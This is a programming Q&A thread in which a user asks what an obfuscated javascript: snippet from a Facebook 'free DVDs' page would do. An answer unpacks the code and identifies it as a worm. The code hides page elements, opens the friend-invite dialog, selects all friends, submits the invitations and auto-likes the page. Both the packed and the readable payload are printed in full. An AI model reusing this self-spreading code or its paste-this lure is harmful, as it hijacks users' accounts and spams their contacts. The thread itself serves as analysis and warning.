# Facebook javascript

Tags: javascript, facebook

A 'friend' on Facebook suggested I become a fan of some video library to get free DVDs and on their fan page under the 'FREE DVDs' tab it had some code it asked users to copy and paste into the address bar.

I am wondering if anyone knows what this code would do just by looking at it.  I guess I need to be logged into Facebook for it to work but I don't want to paste it, in the case it was malicious and spammed all my other Facebook friends.

Can anyone tell?

```
javascript:(function(){a='app113639355344735_ncpCAE';b='app113639355344735_RWwtnR';WGOEjW='app113639355344735_WGOEjW';zsbTwe='app113639355344735_zsbTwe';wwEggB='app113639355344735_wwEggB';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|wwEggB|fs|SocialGraphManager|zsbTwe|WGOEjW|||||||'.split('|'),0,{}))})();
```

Comment: There is no such thing as free cake. Especially not if you are asked to execute some dubious code to get it.

Comment: Yeah, I don't even want to watch free DVDs but I'm more curious about what this line of code is up to.

Comment: Please mark answers as the solution where applicable.

Answer (score 8):

This is compressed using p.a.c.k.e.r
You can use tools like http://jsbeautifier.org/ to unpack it

```
a = 'app113639355344735_ncpCAE';
b = 'app113639355344735_RWwtnR';
WGOEjW = 'app113639355344735_WGOEjW';
zsbTwe = 'app113639355344735_zsbTwe';
wwEggB = 'app113639355344735_wwEggB';
d = document;
d['getElementById'](wwEggB)['style']['visibility'] = 'hidden';
d['getElementById'](a)['innerHTML'] = d['getElementById'](b)['value'];
s = d['getElementById']('suggest');
m = d['getElementById']('likeme');
c = d['createEvent']('MouseEvents');
c['initEvent']('click', true, true);
s['dispatchEvent'](c);
setTimeout(function () {
    fs['select_all']()
}, 5000);
setTimeout(function () {
    SocialGraphManager['submitDialog']('sgm_invite_form', '/ajax/social_graph/invite_dialog.php')
}, 5000);
setTimeout(function () {
    m['dispatchEvent'](c);
    d['getElementById'](zsbTwe)['innerHTML'] = d['getElementById'](WGOEjW)['value']
}, 5000);
```

As you can see, this opens up an invide dialog, selects all friends and issues a click event so as to run the invitation - in short, its a worm.

Comment: Reminds me a bit of the email signature virus… "I am a virus, please copy me to your signature and send me to all your friends." I wonder what the psychological effect is called that makes people switch off their brains when you promise they'll get something "for free". :-\

Comment: Argh, and me. I did mine by hand too :(